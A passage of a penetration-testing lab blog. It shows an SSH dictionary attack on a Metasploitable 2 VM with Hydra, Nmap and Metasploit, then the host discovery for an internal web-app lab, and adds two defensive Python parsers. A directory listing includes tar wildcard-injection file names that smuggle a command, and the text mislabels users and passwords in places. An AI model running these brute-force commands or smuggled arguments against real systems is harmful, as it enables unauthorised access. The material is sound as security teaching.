    As we can see in the previous screenshot, there is a file named Congratulations.txt. Let us download it to our machine and then use the cat command to display its content.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ cat congratulations.txt                     
    Congratulations! You have successfully exploited a null session!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • Brute Force and Password Cracking Live via three different tools

     

    Brute Force and Password Cracking Live via three different tools

     


    Representation


    You are a Penetration Tester hired by the company Hacking Truth to perform password cracking/brute force tests on their internal Web Application and machines, with the usernames already known from a previous security test. You are asked to perform the penetration test on the client premises.



    Brute Force and Password Cracking Live on Metasploitable 2 via three different tools



    In this Metasploitable 2 environment, we get access to a Kali GUI instance. The SSH server on the target can be attacked using the tools installed on the Kali virtual machine.

    Objective: Perform the following activities:

    1. Find the password of user "msfadmin" using Hydra. Use the password dictionary /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt.

    2. Find the password of user "msfadmin" using the appropriate Nmap script. Use the default password dictionary /usr/share/nmap/nselib/data/passwords.lst; the user list is /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt.

    3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use the userpass dictionary /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt.

     

     

    Tools


    The best tools for this lab are:

    # Metasploit Framework
    # Hydra
    # Nmap

     

     


    Check the interfaces present on the Kali machine.

    Command - ifconfig

     


     

    The eth0 interface is available and the IP is 192.168.6.45.




    Using Hydra


    Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

    Hydra

    # Multi-threaded authentication brute force tool
    # Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
    # Written in C


    Hydra help option

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -h                                                                                       
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
    
    Options:
      -R        restore a previous aborted/crashed session
      -I        ignore an existing restore file (don't wait 10 seconds)
      -S        perform an SSL connect
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -y        disable use of symbols in bruteforce, see above
      -r        use a non-random shuffling method for option -x
      -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
      -u        loop around users, not passwords (effective! implied with -x)
      -C FILE   colon separated "login:pass" format, instead of -L/-P options
      -M FILE   list of servers to attack, one entry per line, ':' to specify port
      -o FILE   write found login/password pairs to FILE instead of stdout
      -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
      -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel per target (default: 16)
      -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
      -w / -W TIME  wait time for a response (32) / between connects per thread (0)
      -c TIME   wait time per login attempt over all threads (enforces -t 1)
      -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
      -O        use old SSL v2 and v3
      -K        do not redo failed attempts (good for -M mass scanning)
      -q        do not print messages about connection errors
      -U        service module usage details
      -m OPT    options specific for a module, see -U output for information
      -h        more command line options (COMPLETE HELP)
      server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service   the service to crack (see below for supported protocols)
      OPT       some service modules support additional input (-U for module help)
    
    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    
    Hydra is a tool to guess/crack valid login/password pairs.
    Licensed under AGPL v3.0. The newest version is always available at;
    https://github.com/vanhauser-thc/thc-hydra
    Please don't use in military or secret service organizations, or for illegal
    purposes. (This is a wish and non-binding - most such people do not care about
    laws and ethics anyway - and tell themselves they are one of the good ones.)
    These services were not compiled in: afp ncp oracle sapr3 smb2.
    
    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
         % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
         % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
         % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
    
    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                   
    



    We are going to use the wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt.


    Now, use the Hydra tool to launch the attack.



    Command

    hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

    -l: Login with a single username

    -P: Load several passwords from the list


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
    [DATA] attacking ssh://192.168.6.45:22/
    [22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 1 final worker threads did not complete until end.
    [ERROR] 1 target did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                            
    
    
    





    The password for the msfadmin user is msfadmin.




    Using Nmap Script


    We will run ssh-brute Nmap script to find the password of the "administrator" user.

    Password list used by default by nmap:

    /usr/share/john/password.lst


    /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt




    ssh-brute script


    ssh-brute.nse is a Nmap script used to launch dictionary attacks on the SSH service.

    This script takes username and password list files. This is useful when the target username is not known to the attacker. However, in this case we already know the username, i.e. "administrator", so we will create a new file containing only this username.


    Command


    echo "msfadmin" > user1.txt

    NOTE: msfadmin is our username



    The password list is "/usr/share/nmap/nselib/data/passwords.lst".

    We can now run the script,


    Command

    nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
    [sudo] password for hackerboy: 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
    NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
    NSE: [ssh-brute] Trying username/password pair: msfadmin:
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
    NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
    Nmap scan report for 192.168.6.45
    Host is up (0.00036s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    | ssh-brute: 
    |   Accounts: 
    |     msfadmin:msfadmin - Valid credentials
    |_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    

     


     


    The password of the "msfadmin" user is msfadmin






    Using Metasploit


    We can use

    auxiliary/scanner/ssh/ssh_login

    auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

    ssh_login module

    It is an auxiliary scanner module for the SSH service in Metasploit. It also opens an SSH shell on success.


    Start msfconsole in quiet mode using the -q option.



    Command

    msfconsole -q

     



    Use the auxiliary/scanner/ssh/ssh_login module and set all required target details, i.e. RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose, etc.



    Password List

    /usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

     

    Command

    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS demo.ine.local
    set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    set STOP_ON_SUCCESS true
    set verbose true
    exploit




    RHOSTS: Target IP address

    USERPASS_FILE: Custom username and password file, i.e. user:pass

    STOP_ON_SUCCESS: If set to true, the operation stops after finding the working credentials

    verbose: If set to true, operation logs will be shown on the console

     

     

    [Screenshot: contents of userpass.txt]

     

     

     



     

    msf6 >
    msf6 > search ssh_login
    
    Matching Modules
    ================
    
       #  Name                                    Disclosure Date  Rank    Check  Description
       -  ----                                    ---------------  ----    -----  -----------
       0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
       1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
    
    
    Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
    
    msf6 > use 0
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
    RHOSTS => 192.168.6.45
    msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
    verbose => true
    msf6 auxiliary(scanner/ssh/ssh_login) > exploit
    
    [*] 192.168.6.45:22 - Starting bruteforce
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
    [+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     




    The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

    Command

    sessions

     

     

    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type         Information                                Connection
      --  ----  ----         -----------                                ----------
      1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
      2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     



    The Metasploit Framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

    We can use the credentials to access the target machine using the SSH command.



    SSH to the target machine using the credentials of user "root".


    Command

    ssh msfadmin@192.168.6.45
    <yes>
    <attack>
    id
    whoami
    ls -la


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
    The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
    RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
    This host key is known by the following other names/addresses:
        ~/.ssh/known_hosts:2: [hashed name]
        ~/.ssh/known_hosts:6: [hashed name]
        ~/.ssh/known_hosts:80: [hashed name]
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
    msfadmin@192.168.6.45's password: 
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Fri Dec 24 09:17:35 2021
    msfadmin@metasploitable:~$ id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    msfadmin@metasploitable:~$       
    msfadmin@metasploitable:~$ whoami
    msfadmin
    msfadmin@metasploitable:~$ 
    msfadmin@metasploitable:~$ ls -la
    total 68
    drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
    drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
    lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
    -rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
    drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
    -rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
    -rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
    -rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
    -rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
    drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
    -rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
    -rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
    drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
    msfadmin@metasploitable:~$ 
    
    
    

     


    This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.
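    Added example, not code from the original post: a Python detector for the pattern all three tools leave in the target's sshd log, a burst of failed logins from one source followed by a success. The auth.log lines, thresholds and hostnames are constructed for illustration and mimic the Hydra run shown earlier (13 parallel tasks, success within a few seconds).

```python
"""Detect SSH dictionary attacks in sshd auth.log lines.

Added example (not from the original post). Two signals are raised:
  - "bruteforce": a source exceeds `threshold` failures inside `window_s`
  - "success_after_bruteforce": that same source then authenticates,
    which is the compromised-credential case worth paging on.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (syslog format, year not included).
SAMPLE_LOG = """\
Dec 24 20:33:02 metasploitable sshd[4521]: Failed password for msfadmin from 192.168.6.25 port 42101 ssh2
Dec 24 20:33:02 metasploitable sshd[4523]: Failed password for msfadmin from 192.168.6.25 port 42103 ssh2
Dec 24 20:33:03 metasploitable sshd[4525]: Failed password for msfadmin from 192.168.6.25 port 42105 ssh2
Dec 24 20:33:03 metasploitable sshd[4527]: Failed password for invalid user hackerboy from 192.168.6.25 port 42107 ssh2
Dec 24 20:33:04 metasploitable sshd[4529]: Failed password for msfadmin from 192.168.6.25 port 42109 ssh2
Dec 24 20:33:04 metasploitable sshd[4531]: Failed password for msfadmin from 192.168.6.25 port 42111 ssh2
Dec 24 20:33:05 metasploitable sshd[4533]: Accepted password for msfadmin from 192.168.6.25 port 42113 ssh2
Dec 24 20:40:10 metasploitable sshd[4600]: Accepted password for msfadmin from 192.168.6.30 port 50001 ssh2
"""

# OpenSSH password-auth result lines; "invalid user" appears for unknown accounts.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2021):
    """Parse one auth.log line into a dict, or return None for other lines.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"),
            "user": m.group("user"), "src": m.group("src")}


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Sliding-window count of failures per source IP.

    Returns a list of (signal, source_ip, username) tuples in log order.
    A source is alerted once; any later success from it is flagged too."""
    failures = defaultdict(list)  # src -> timestamps of recent failures
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        src, ts = ev["src"], ev["ts"]
        if ev["result"] == "Failed":
            # keep only failures inside the window, then add this one
            recent = [t for t in failures[src]
                      if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[src] = recent
            if len(recent) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append(("bruteforce", src, ev["user"]))
        elif src in alerted:
            # a success from a source already guessing = likely compromise
            alerts.append(("success_after_bruteforce", src, ev["user"]))
    return alerts


if __name__ == "__main__":
    for signal, src, user in detect_bruteforce(SAMPLE_LOG):
        print(f"[!] {signal}: {src} (user {user})")
```

The same counting is what fail2ban or a SIEM rule does; Hydra's own warning about reducing to -t 4 exists because this burst is also what trips sshd's MaxStartups limit.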




     

     

  • Penetration Testing on Internal Web Application


    Penetration Testing on Internal Web Application

     

     

    Representation


    You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.




    Objective


    The objective is first to find the web servers in the network you are directly attached to, and then to test the web application running on them in order to check whether you can access restricted areas (such as the login page)!



    Tools


    The best tools for this lab are -

    # Dirbuster
    # mysql
    # Web browser



    Follow these steps:


    1) Find all the machines in the network

    2) Identify the machines' roles

    3) Explore the web application

    4) Find hidden files

    5) Test the credentials found

    6) Retrieve the correct admin password


    Solutions steps


    Find all the machines in the network

    We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig           
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 12329  bytes 1183972 (1.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 12329  bytes 1183972 (1.1 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
            ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
            RX packets 4679  bytes 256538 (250.5 KiB)
            RX errors 0  dropped 2  overruns 0  frame 0
            TX packets 5763  bytes 321536 (314.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
            inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 95039  bytes 105443523 (100.5 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 56428  bytes 9346057 (8.9 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    


    As we can see, the target network is 10.104.11.0/24. Let's run nmap with the -sn option in order to discover all the available hosts on the network.





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 10.104.11.0/24 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.61s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.198
    Host is up (0.64s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.50
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    The previous command shows that, besides our own machine (10.104.11.50), there are only two hosts alive in the network: 10.104.11.96 and 10.104.11.198.

     


    Identify the machines' roles


    Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sV 10.104.11.96,198
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.85s latency).                                                         
    Not shown: 998 closed tcp ports (reset)                                        
    PORT   STATE SERVICE VERSION                                       
    22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.22 ((Debian))
    MAC Address: 00:50:56:A5:03:17 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 10.104.11.198
    Host is up (0.91s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
    └─$ 
    
    



    From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL.

    Since the scope of the engagement is to check if an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.
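    Reading two or three scan reports by eye is fine, but on a larger range it pays to parse nmap's normal output into an inventory and query it. The parser below is an added example and is not part of the original post; the sample text is constructed from the scan output above (with the third host from the ping sweep included), and the function names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of nmap's normal output, modelled on the
# scans shown above. This is not a live scan result.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
Nmap scan report for 10.104.11.96
Host is up (0.85s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:03:17 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.91s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:F5:80 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.50
Host is up.
Nmap done: 3 IP addresses (3 hosts up) scanned in 143.46 seconds
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.*)\))?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Host:
    ip: str
    mac: str = ""
    vendor: str = ""
    up: bool = False
    # (port, proto, state, service, version) tuples, one per port line
    ports: list = field(default_factory=list)


def parse_nmap(text):
    """Turn nmap normal output into a list of Host records."""
    hosts = []
    cur = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            cur = Host(ip=m.group(1))
            hosts.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Host is up"):
            cur.up = True
            continue
        m = MAC_RE.match(line)
        if m:
            cur.mac = m.group(1).upper()
            cur.vendor = m.group(2) or ""
            continue
        m = PORT_RE.match(line)
        if m:
            cur.ports.append((int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
    return hosts


def open_services(hosts):
    """Map service name -> ip:port list, the "who runs http, who runs mysql"
    answer that the text above draws by eye."""
    out = {}
    for h in hosts:
        for port, _proto, state, service, _version in h.ports:
            if state == "open":
                out.setdefault(service, []).append(f"{h.ip}:{port}")
    return out


def hosts_without_mac(hosts):
    """Nmap prints a MAC line only for hosts reached on the local Ethernet
    segment, and never for the scanning host itself; entries without one
    deserve a second look before they are treated as targets."""
    return [h.ip for h in hosts if h.up and not h.mac]


if __name__ == "__main__":
    inventory = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for service, where in open_services(inventory).items():
        print(f"{service:8} {', '.join(where)}")
    print("no MAC reported:", hosts_without_mac(inventory))
```

    For larger engagements the same information is available in a stable machine-readable form via nmap's -oX (XML) output; the parser above is for the normal output that is pasted into notes and reports.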




    Explore the web application


    In order to inspect the web application we just need to type the IP address of the target machine into our browser.



    Penetration Testing on Internal Web Application


    If we inspect the web application, we can see that the "Sign up" page is not available, meaning that we cannot create a new user in order to access the restricted area.

